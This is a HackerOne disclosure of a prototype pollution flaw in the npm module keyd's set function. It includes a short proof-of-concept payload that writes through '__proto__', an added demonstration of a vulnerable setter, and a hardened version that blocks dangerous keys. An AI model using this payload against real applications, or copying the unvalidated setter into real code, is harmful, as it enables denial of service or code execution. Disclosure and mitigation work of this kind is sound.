I would like to report a `prototype pollution` vulnerability in the `keyd` module.
It allows an attacker to inject properties on Object.prototype.
# Module
**module name:** `keyd`
**version:** `1.3.4`
**npm page:** `https://www.npmjs.com/package/keyd`
## Module Description
A small library for using and manipulating key paths in JavaScript.
## Module Stats
[71] weekly downloads
# Vulnerability
## Vulnerability Description
The `set` function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.
## Steps To Reproduce:
- install `keyd` module:
  - `npm i keyd`

Set the `__proto__.polluted` property of an object:
```javascript
const keyd = require('keyd');
const obj = {};
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');
console.log("After : " + obj.polluted);
```
Output:
```console
Before : undefined
After : yes
```
## Supporting Material/References:
- OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS
- NODEJS VERSION: v14.1.0
- NPM VERSION: 6.14.5
# Wrap up
- I contacted the maintainer to let them know: [N]
- I opened an issue in the related repository: [N]
Thank you for your time.
best regards,
d3lla
## Impact
The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution, Property Injection.
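
The flaw class reported above, next to one way to mitigate it, as an added example that is not part of the original report and is not keyd's code. `naiveSet`, `safeSet`, `define` and `demo` are hypothetical helpers written for illustration, and the path syntax is assumed to be plain dot-separated keys.

```javascript
// Added example: hypothetical helpers, not keyd's implementation.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Walks a dotted key path with no validation: the flaw class the report describes.
function naiveSet(target, path, value) {
  const keys = path.split('.');
  let node = target;
  for (const key of keys.slice(0, -1)) {
    if (typeof node[key] !== 'object' || node[key] === null) node[key] = {};
    node = node[key]; // '__proto__' resolves to Object.prototype here
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Creates an own data property without invoking inherited setters.
function define(node, key, value) {
  Object.defineProperty(node, key, { value, writable: true, enumerable: true, configurable: true });
}

// Hardened variant: rejects dangerous segments and descends only into own properties.
function safeSet(target, path, value) {
  const keys = path.split('.');
  if (keys.some((k) => BLOCKED.has(k))) {
    throw new TypeError(`refusing unsafe key path: ${path}`);
  }
  let node = target;
  for (const key of keys.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || typeof node[key] !== 'object' || node[key] === null) define(node, key, {});
    node = node[key];
  }
  define(node, keys[keys.length - 1], value);
  return target;
}

// Runs both setters on the report's path and records what a fresh object sees.
function demo() {
  const result = {};
  naiveSet({}, '__proto__.polluted', 'yes');
  result.naivePolluted = ({}).polluted === 'yes';
  delete Object.prototype.polluted; // restore the prototype before the next check
  try { safeSet({}, '__proto__.polluted', 'yes'); result.safeRejected = false; }
  catch (e) { result.safeRejected = e instanceof TypeError; }
  result.safePolluted = ({}).polluted !== undefined;
  result.nested = safeSet({}, 'a.b.c', 1).a.b.c;
  return result;
}
console.log(demo());
```

Applications that cannot change the setter can still reduce exposure by validating key paths taken from untrusted input before they reach any path-setting library.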
Report: "Node.js third-party modules: [keyd] Prototype pollution", https://hackerone.com/reports/877515 (HackerOne, nodejs-ecosystem). Reporter: d3lla. Published: 2020-05-18T19:58:29. Modified: 2020-09-14T10:51:47. State: resolved.